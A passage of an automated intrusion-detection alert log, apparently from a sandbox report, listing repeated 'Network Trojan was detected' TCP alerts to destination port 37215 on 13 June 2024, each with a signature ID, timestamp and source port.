              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.841175
              SID:2835222
              Source Port:55134
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.175914
              SID:2829579
              Source Port:36920
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.834308
              SID:2829579
              Source Port:55326
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.304818
              SID:2835222
              Source Port:37890
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.223328
              SID:2835222
              Source Port:51890
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.025275
              SID:2835222
              Source Port:39298
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.660251
              SID:2829579
              Source Port:53826
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.045317
              SID:2835222
              Source Port:38484
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.942771
              SID:2829579
              Source Port:56756
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.784644
              SID:2835222
              Source Port:35178
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.424487
              SID:2835222
              Source Port:35748
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:05.011634
              SID:2829579
              Source Port:36638
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.502670
              SID:2835222
              Source Port:47262
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.058461
              SID:2829579
              Source Port:60876
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.164767
              SID:2829579
              Source Port:53248
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.911373
              SID:2829579
              Source Port:56718
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.547419
              SID:2829579
              Source Port:43302
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.710044
              SID:2835222
              Source Port:44598
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.554620
              SID:2835222
              Source Port:60258
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.730662
              SID:2835222
              Source Port:38708
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.420213
              SID:2835222
              Source Port:58856
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.502640
              SID:2835222
              Source Port:45930
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.730222
              SID:2829579
              Source Port:44394
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.258888
              SID:2835222
              Source Port:47094
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.401153
              SID:2829579
              Source Port:43756
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.731601
              SID:2835222
              Source Port:53944
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.694439
              SID:2835222
              Source Port:55838
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.631232
              SID:2835222
              Source Port:58866
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.091932
              SID:2835222
              Source Port:53730
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.751998
              SID:2829579
              Source Port:37178
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.348592
              SID:2835222
              Source Port:42824
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.404007
              SID:2835222
              Source Port:58826
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.658959
              SID:2835222
              Source Port:53276
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.751143
              SID:2829579
              Source Port:57738
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.090431
              SID:2829579
              Source Port:51436
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.710635
              SID:2829579
              Source Port:37754
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.418328
              SID:2829579
              Source Port:59538
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.134340
              SID:2835222
              Source Port:50586
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.479797
              SID:2835222
              Source Port:49152
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.911068
              SID:2829579
              Source Port:50260
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.694592
              SID:2829579
              Source Port:57786
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.305543
              SID:2835222
              Source Port:43574
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.416877
              SID:2829579
              Source Port:42636
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.076183
              SID:2835222
              Source Port:38902
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.028827
              SID:2829579
              Source Port:58570
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.045248
              SID:2835222
              Source Port:34352
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.106206
              SID:2829579
              Source Port:53222
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.074782
              SID:2829579
              Source Port:36796
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.711863
              SID:2829579
              Source Port:49316
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.170852
              SID:2835222
              Source Port:37668
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.168575
              SID:2835222
              Source Port:51376
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.871918
              SID:2829579
              Source Port:60524
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.409088
              SID:2829579
              Source Port:57186
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.570774
              SID:2829579
              Source Port:48080
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.610561
              SID:2829579
              Source Port:54532
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.168976
              SID:2835222
              Source Port:55100
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.306890
              SID:2829579
              Source Port:43380
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:05.017070
              SID:2829579
              Source Port:58254
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.836798
              SID:2835222
              Source Port:36180
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.785574
              SID:2829579
              Source Port:54946
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.308960
              SID:2829579
              Source Port:47998
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.606172
              SID:2829579
              Source Port:55850
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.294685
              SID:2829579
              Source Port:38332
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.730245
              SID:2829579
              Source Port:39722
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:04.991553
              SID:2829579
              Source Port:53914
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.130232
              SID:2835222
              Source Port:42708
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.307077
              SID:2829579
              Source Port:36186
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.241882
              SID:2835222
              Source Port:46964
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.568127
              SID:2835222
              Source Port:46566
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.247200
              SID:2829579
              Source Port:55436
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.160081
              SID:2835222
              Source Port:51744
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.409659
              SID:2835222
              Source Port:44036
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.806008
              SID:2835222
              Source Port:46564
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.632811
              SID:2829579
              Source Port:59304
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.821993
              SID:2835222
              Source Port:49680
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.027122
              SID:2829579
              Source Port:49708
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.309844
              SID:2829579
              Source Port:60276
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.300777
              SID:2829579
              Source Port:53462
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.175738
              SID:2835222
              Source Port:42556
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.220803
              SID:2829579
              Source Port:50376
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.570053
              SID:2829579
              Source Port:35978
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.459028
              SID:2829579
              Source Port:52224
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.506556
              SID:2835222
              Source Port:35442
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.403036
              SID:2835222
              Source Port:37250
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.166377
              SID:2835222
              Source Port:50744
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.401431
              SID:2835222
              Source Port:60224
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.545157
              SID:2835222
              Source Port:46888
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.549579
              SID:2835222
              Source Port:38866
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.629333
              SID:2829579
              Source Port:51968
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.373881
              SID:2829579
              Source Port:42556
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.611355
              SID:2835222
              Source Port:57398
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.865956
              SID:2829579
              Source Port:54762
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.090676
              SID:2829579
              Source Port:57100
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.552301
              SID:2829579
              Source Port:33172
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.299196
              SID:2835222
              Source Port:46502
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.674976
              SID:2835222
              Source Port:36148
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.945917
              SID:2829579
              Source Port:47930
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.553427
              SID:2829579
              Source Port:37270
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.572803
              SID:2829579
              Source Port:56914
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.553289
              SID:2835222
              Source Port:45952
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.543283
              SID:2829579
              Source Port:36594
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.222717
              SID:2829579
              Source Port:54816
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.404567
              SID:2835222
              Source Port:49674
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.452909
              SID:2835222
              Source Port:40320
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.212071
              SID:2835222
              Source Port:52820
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.790122
              SID:2835222
              Source Port:34934
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.153636
              SID:2829579
              Source Port:57622
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.279587
              SID:2829579
              Source Port:44504
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.045630
              SID:2835222
              Source Port:59152
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.611550
              SID:2835222
              Source Port:60110
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.867672
              SID:2829579
              Source Port:55824
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.676438
              SID:2835222
              Source Port:43144
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.027454
              SID:2829579
              Source Port:59592
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.042877
              SID:2829579
              Source Port:54730
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:04.993097
              SID:2829579
              Source Port:52388
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.486976
              SID:2835222
              Source Port:41944
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.759339
              SID:2835222
              Source Port:37494
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.152875
              SID:2829579
              Source Port:56248
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.174147
              SID:2829579
              Source Port:57272
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.457557
              SID:2835222
              Source Port:48356
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.526063
              SID:2829579
              Source Port:58784
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.092250
              SID:2829579
              Source Port:39980
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.420082
              SID:2829579
              Source Port:34010
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.476446
              SID:2835222
              Source Port:55984
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.348436
              SID:2835222
              Source Port:38244
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.843558
              SID:2829579
              Source Port:58350
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.942572
              SID:2835222
              Source Port:51744
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.657293
              SID:2835222
              Source Port:45552
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.454821
              SID:2835222
              Source Port:55680
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.200004
              SID:2835222
              Source Port:45706
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.085316
              SID:2835222
              Source Port:38230
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:04.993286
              SID:2829579
              Source Port:40240
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.173893
              SID:2835222
              Source Port:55048
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.304056
              SID:2829579
              Source Port:59134
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.349218
              SID:2829579
              Source Port:40458
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.256452
              SID:2829579
              Source Port:52226
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.309969
              SID:2829579
              Source Port:46858
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.155725
              SID:2835222
              Source Port:56816
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.263640
              SID:2829579
              Source Port:36890
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.707847
              SID:2829579
              Source Port:44352
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.789773
              SID:2829579
              Source Port:53728
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.199405
              SID:2829579
              Source Port:46240
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.749872
              SID:2829579
              Source Port:46948
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.323897
              SID:2835222
              Source Port:45936
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.224723
              SID:2835222
              Source Port:43954
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.151012
              SID:2829579
              Source Port:55346
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.885239
              SID:2829579
              Source Port:58388
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.041880
              SID:2829579
              Source Port:56772
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.087655
              SID:2829579
              Source Port:48470
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.486507
              SID:2829579
              Source Port:49772
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.111889
              SID:2829579
              Source Port:41618
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.213577
              SID:2829579
              Source Port:44786
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.486448
              SID:2829579
              Source Port:51658
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.727874
              SID:2829579
              Source Port:42800
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.677356
              SID:2835222
              Source Port:34226
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.867955
              SID:2829579
              Source Port:41308
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.079791
              SID:2829579
              Source Port:56946
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.371764
              SID:2835222
              Source Port:60960
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.887152
              SID:2829579
              Source Port:59762
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.940609
              SID:2829579
              Source Port:51768
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.569251
              SID:2835222
              Source Port:53496
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.676219
              SID:2835222
              Source Port:42126
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.151276
              SID:2829579
              Source Port:45726
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.171336
              SID:2835222
              Source Port:39478
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.749768
              SID:2835222
              Source Port:42888
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.972864
              SID:2835222
              Source Port:39948
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.306691
              SID:2835222
              Source Port:37572
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.607324
              SID:2829579
              Source Port:54238
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.217257
              SID:2829579
              Source Port:39590
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.212747
              SID:2835222
              Source Port:34042
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.358008
              SID:2835222
              Source Port:48612
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.610174
              SID:2835222
              Source Port:32998
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.156519
              SID:2835222
              Source Port:48576
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.503366
              SID:2835222
              Source Port:37572
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.526199
              SID:2835222
              Source Port:48590
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.440748
              SID:2835222
              Source Port:42888
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.976881
              SID:2829579
              Source Port:42850
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.823602
              SID:2829579
              Source Port:58378
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.677993
              SID:2829579
              Source Port:35868
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.254035
              SID:2829579
              Source Port:45326
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.553736
              SID:2829579
              Source Port:39962
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.867166
              SID:2829579
              Source Port:54930
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.402238
              SID:2835222
              Source Port:35188
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.478724
              SID:2829579
              Source Port:41338
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.343644
              SID:2835222
              Source Port:51550
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.997333
              SID:2829579
              Source Port:44396
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.210672
              SID:2835222
              Source Port:55110
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.782088
              SID:2835222
              Source Port:58394
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.757830
              SID:2829579
              Source Port:39298
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.671521
              SID:2829579
              Source Port:41278
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.914670
              SID:2829579
              Source Port:49930
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.611084
              SID:2829579
              Source Port:39216
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.085589
              SID:2829579
              Source Port:46908
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.913292
              SID:2829579
              Source Port:48036
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.631968
              SID:2829579
              Source Port:37568
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:05.011690
              SID:2835222
              Source Port:56962
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.630150
              SID:2835222
              Source Port:40806
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
